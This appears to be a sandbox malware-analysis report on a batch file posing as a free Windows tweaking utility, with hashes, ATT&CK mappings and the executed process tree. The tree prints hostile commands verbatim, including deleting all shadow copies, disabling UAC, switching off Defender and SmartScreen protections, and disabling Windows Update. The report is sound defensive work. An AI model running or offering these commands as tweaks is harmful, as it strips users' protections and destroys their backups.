Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 10:13
Static task
static1
Behavioral task
behavioral1
Sample
Octo Free Tweaking Utility V1.0.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Octo Free Tweaking Utility V1.0.bat
Resource
win10v2004-20241007-en
General
-
Target
Octo Free Tweaking Utility V1.0.bat
-
Size
32KB
-
MD5
8392add3fcbeded059c0788e13305148
-
SHA1
aabebd21818beb9d92354a26bff3b091f6d33070
-
SHA256
bd035666f01df67518bf6a7976e58d019fe4281b7cc959bc623b5bbc8cb6aa31
-
SHA512
454321ad19d4544632c51d02a2cd9adb48d856a982e45afdf2c2abd06412a212bb4ee60075ceee1f46370ecb722ed73d0749fd9cae1f627cfd3013d221728774
-
SSDEEP
384:5TFAFXvNHSuTB4VPVVpZzBYqvRBzalRL/TJ:5TqXDSPVVpZzclRL/TJ
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Deletes itself 1 IoCs
pid Process 2364 cmd.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to get system information.
pid Process 2656 powershell.exe 1620 powershell.exe 2940 powershell.exe 1792 powershell.exe 1264 powershell.exe 2116 powershell.exe 2564 powershell.exe 1752 powershell.exe 2060 powershell.exe 1584 powershell.exe -
Power Settings 1 TTPs 46 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2564 powercfg.exe 1776 powercfg.exe 1456 powercfg.exe 2608 powercfg.exe 3004 powercfg.exe 1624 powercfg.exe 2412 powercfg.exe 2744 powercfg.exe 1772 powercfg.exe 2796 powercfg.exe 2880 powercfg.exe 2720 powercfg.exe 2792 powercfg.exe 2596 powercfg.exe 2612 powercfg.exe 2148 powercfg.exe 1272 powercfg.exe 2108 powercfg.exe 1768 powercfg.exe 2908 powercfg.exe 2556 powercfg.exe 2632 powercfg.exe 1928 powercfg.exe 2392 powercfg.exe 2652 powercfg.exe 904 powercfg.exe 2672 powercfg.exe 1236 powercfg.exe 2668 powercfg.exe 2724 powercfg.exe 2644 powercfg.exe 2204 powercfg.exe 2692 powercfg.exe 2688 powercfg.exe 2828 powercfg.exe 2800 powercfg.exe 2620 powercfg.exe 1812 powercfg.exe 2196 powercfg.exe 2200 powercfg.exe 2684 powercfg.exe 2572 powercfg.exe 2056 powercfg.exe 2396 powercfg.exe 300 powercfg.exe 2580 powercfg.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1428 sc.exe 864 sc.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1000 vssadmin.exe 1572 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2656 powershell.exe 1620 powershell.exe 2940 powershell.exe 1792 powershell.exe 1264 powershell.exe 2116 powershell.exe 1584 powershell.exe 2564 powershell.exe 1752 powershell.exe 2060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2684 powercfg.exe Token: SeShutdownPrivilege 2688 powercfg.exe Token: SeShutdownPrivilege 2108 powercfg.exe Token: SeShutdownPrivilege 2672 powercfg.exe Token: SeShutdownPrivilege 2908 powercfg.exe Token: SeShutdownPrivilege 2796 powercfg.exe Token: SeShutdownPrivilege 2828 powercfg.exe Token: SeShutdownPrivilege 2800 powercfg.exe Token: SeShutdownPrivilege 2580 powercfg.exe Token: SeShutdownPrivilege 2880 powercfg.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeShutdownPrivilege 2692 powercfg.exe Token: SeShutdownPrivilege 1236 powercfg.exe Token: SeShutdownPrivilege 2720 powercfg.exe Token: SeShutdownPrivilege 2668 powercfg.exe Token: SeShutdownPrivilege 2608 powercfg.exe Token: SeShutdownPrivilege 2792 powercfg.exe Token: SeShutdownPrivilege 2556 powercfg.exe Token: SeShutdownPrivilege 2564 powercfg.exe Token: SeShutdownPrivilege 2572 powercfg.exe Token: SeShutdownPrivilege 2596 powercfg.exe Token: SeShutdownPrivilege 2620 powercfg.exe Token: SeShutdownPrivilege 2632 powercfg.exe Token: SeShutdownPrivilege 2724 powercfg.exe Token: SeShutdownPrivilege 1776 powercfg.exe Token: SeShutdownPrivilege 3004 powercfg.exe Token: SeShutdownPrivilege 2612 powercfg.exe Token: SeShutdownPrivilege 2148 powercfg.exe Token: SeShutdownPrivilege 1272 powercfg.exe Token: SeShutdownPrivilege 2056 powercfg.exe Token: SeShutdownPrivilege 1772 powercfg.exe Token: SeShutdownPrivilege 1812 powercfg.exe Token: SeShutdownPrivilege 1624 powercfg.exe Token: SeShutdownPrivilege 2644 powercfg.exe Token: SeShutdownPrivilege 1928 powercfg.exe Token: SeShutdownPrivilege 2196 powercfg.exe Token: SeShutdownPrivilege 2200 powercfg.exe Token: SeShutdownPrivilege 1456 powercfg.exe Token: SeShutdownPrivilege 2412 powercfg.exe Token: SeShutdownPrivilege 2396 powercfg.exe Token: SeShutdownPrivilege 2204 powercfg.exe Token: SeShutdownPrivilege 2392 powercfg.exe Token: SeShutdownPrivilege 2652 powercfg.exe Token: SeShutdownPrivilege 1768 powercfg.exe Token: SeShutdownPrivilege 300 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeCreatePagefilePrivilege 904 powercfg.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeBackupPrivilege 908 vssvc.exe Token: SeRestorePrivilege 908 vssvc.exe Token: SeAuditPrivilege 908 vssvc.exe Token: SeDebugPrivilege 1584 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 2912 2364 cmd.exe 31 PID 2364 wrote to memory of 2912 2364 cmd.exe 31 PID 2364 wrote to memory of 2912 2364 cmd.exe 31 PID 2912 wrote to memory of 2700 2912 cmd.exe 32 PID 2912 wrote to memory of 2700 2912 cmd.exe 32 PID 2912 wrote to memory of 2700 2912 cmd.exe 32 PID 2364 wrote to memory of 2684 2364 cmd.exe 33 PID 2364 wrote to memory of 2684 2364 cmd.exe 33 PID 2364 wrote to memory of 2684 2364 cmd.exe 33 PID 2364 wrote to memory of 2688 2364 cmd.exe 34 PID 2364 wrote to memory of 2688 2364 cmd.exe 34 PID 2364 wrote to memory of 2688 2364 cmd.exe 34 PID 2364 wrote to memory of 2108 2364 cmd.exe 35 PID 2364 wrote to memory of 2108 2364 cmd.exe 35 PID 2364 wrote to memory of 2108 2364 cmd.exe 35 PID 2364 wrote to memory of 2672 2364 cmd.exe 36 PID 2364 wrote to memory of 2672 2364 cmd.exe 36 PID 2364 wrote to memory of 2672 2364 cmd.exe 36 PID 2364 wrote to memory of 2908 2364 cmd.exe 37 PID 2364 wrote to memory of 2908 2364 cmd.exe 37 PID 2364 wrote to memory of 2908 2364 cmd.exe 37 PID 2364 wrote to memory of 2796 2364 cmd.exe 38 PID 2364 wrote to memory of 2796 2364 cmd.exe 38 PID 2364 wrote to memory of 2796 2364 cmd.exe 38 PID 2364 wrote to memory of 2828 2364 cmd.exe 39 PID 2364 wrote to memory of 2828 2364 cmd.exe 39 PID 2364 wrote to memory of 2828 2364 cmd.exe 39 PID 2364 wrote to memory of 2800 2364 cmd.exe 40 PID 2364 wrote to memory of 2800 2364 cmd.exe 40 PID 2364 wrote to memory of 2800 2364 cmd.exe 40 PID 2364 wrote to memory of 2580 2364 cmd.exe 41 PID 2364 wrote to memory of 2580 2364 cmd.exe 41 PID 2364 wrote to memory of 2580 2364 cmd.exe 41 PID 2364 wrote to memory of 2880 2364 cmd.exe 42 PID 2364 wrote to memory of 2880 2364 cmd.exe 42 PID 2364 wrote to memory of 2880 2364 cmd.exe 42 PID 2364 wrote to memory of 2744 2364 cmd.exe 43 PID 2364 wrote to memory of 2744 2364 cmd.exe 43 PID 2364 wrote to memory of 2744 2364 cmd.exe 43 PID 2364 wrote to memory of 2692 2364 cmd.exe 44 PID 2364 wrote to memory of 2692 2364 cmd.exe 44 PID 2364 wrote to memory of 2692 2364 cmd.exe 44 PID 2364 wrote to memory of 1236 2364 cmd.exe 45 PID 2364 wrote to memory of 1236 2364 cmd.exe 45 PID 2364 wrote to memory of 1236 2364 cmd.exe 45 PID 2364 wrote to memory of 2720 2364 cmd.exe 46 PID 2364 wrote to memory of 2720 2364 cmd.exe 46 PID 2364 wrote to memory of 2720 2364 cmd.exe 46 PID 2364 wrote to memory of 2668 2364 cmd.exe 47 PID 2364 wrote to memory of 2668 2364 cmd.exe 47 PID 2364 wrote to memory of 2668 2364 cmd.exe 47 PID 2364 wrote to memory of 2608 2364 cmd.exe 48 PID 2364 wrote to memory of 2608 2364 cmd.exe 48 PID 2364 wrote to memory of 2608 2364 cmd.exe 48 PID 2364 wrote to memory of 2792 2364 cmd.exe 49 PID 2364 wrote to memory of 2792 2364 cmd.exe 49 PID 2364 wrote to memory of 2792 2364 cmd.exe 49 PID 2364 wrote to memory of 2556 2364 cmd.exe 50 PID 2364 wrote to memory of 2556 2364 cmd.exe 50 PID 2364 wrote to memory of 2556 2364 cmd.exe 50 PID 2364 wrote to memory of 2564 2364 cmd.exe 51 PID 2364 wrote to memory of 2564 2364 cmd.exe 51 PID 2364 wrote to memory of 2564 2364 cmd.exe 51 PID 2364 wrote to memory of 2572 2364 cmd.exe 52 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\findstr.exefindstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"3⤵PID:2700
-
-
-
C:\Windows\system32\powercfg.exepowercfg -change -monitor-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\system32\powercfg.exepowercfg -change -monitor-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\powercfg.exepowercfg -change -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\system32\powercfg.exepowercfg -change -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\system32\powercfg.exepowercfg -setactive scheme_max2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMAX 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMAX 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMIN 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMIN 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_display brightness 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_display brightness 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_disk disk_idle 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_disk disk_idle 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_disk idle_time 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_disk idle_time 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_usb selective_suspend 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_usb selective_suspend 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_video adaptive_display 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_video adaptive_display 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_display brightness 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_display brightness 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_cpu idle_timeout 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_cpu idle_timeout 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_hybrid sleep 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_hybrid sleep 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_graphics adaptive_graphics 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_graphics adaptive_graphics 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_processor PERFDISPLAY 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_processor PERFDISPLAY 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_processor PROCFREQUENCY 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_processor PROCFREQUENCY 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_video dynamic_contrast 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_video dynamic_contrast 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_dvd video_speed 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_dvd video_speed 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_system cooling_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_system cooling_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_system processor_power_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_system processor_power_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_memory standby_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_memory standby_policy 12⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_system cpu_core 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_system cpu_core 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex scheme_max sub_processor clock_speed 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex scheme_max sub_processor clock_speed 1002⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\system32\powercfg.exepowercfg -h off2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"2⤵PID:2280
-
C:\Windows\system32\findstr.exefindstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"3⤵PID:752
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-310093Enabled" /t REG_DWORD /d 0 /f2⤵PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-CimInstance -ClassName Win32_StartupCommand | Remove-CimInstance"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "wuauserv" -StartupType Disabled # Windows Update Service"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "Spooler" -StartupType Disabled # Print Spooler"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "RemoteRegistry" -StartupType Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "Superfetch" -StartupType Disabled "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "WMPNetworkSvc" -StartupType Disabled Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f2⤵PID:296
-
-
C:\Windows\system32\sc.exesc config werSvc start= disabled2⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\system32\sc.exesc stop werSvc2⤵
- Launches sc.exe
PID:864
-
-
C:\Windows\system32\vssadmin.exevssadmin list shadowstorage2⤵
- Interacts with shadow copies
PID:1000
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /for=C: /all2⤵
- Interacts with shadow copies
PID:1572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-WmiObject -Class Win32_PrintJob | foreach { $_.Delete() }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 1 /f2⤵PID:1236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableActionCenter" /t REG_DWORD /d 0 /f2⤵PID:2720
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:2668
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "FileHistory" /t REG_DWORD /d 0 /f2⤵PID:2608
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "Enabled" /t REG_DWORD /d 0 /f2⤵PID:2792
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f2⤵PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScanOnRealtimeEnable $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f2⤵PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableCloudProtection $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreen" /t REG_DWORD /d 1 /f2⤵PID:2120
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "WindowsStore" /t REG_DWORD /d 0 /f2⤵PID:2008
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f2⤵PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-Service -Name "w32time" -StartupType Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableLogonScripts" /t REG_DWORD /d 1 /f2⤵PID:744
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2540
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2388
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Windows Management Instrumentation
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55980ced64499d5dda1dd3aa2a20e99c7
SHA1acac427fdb104025df9f4748769efe1d77163008
SHA256c9a998dc0abf6798ebbf4326cb31a0a7f911865ba9c099fa8bb592ca75a3309a
SHA512ec1bde10a6b996bc232e26245e9e47024135eabcfac72c37d3f7eb7b88e9fb92f7489435cbfc2ad88056bdcf57f7f0e5134f226299b006275d4f03295f415ff7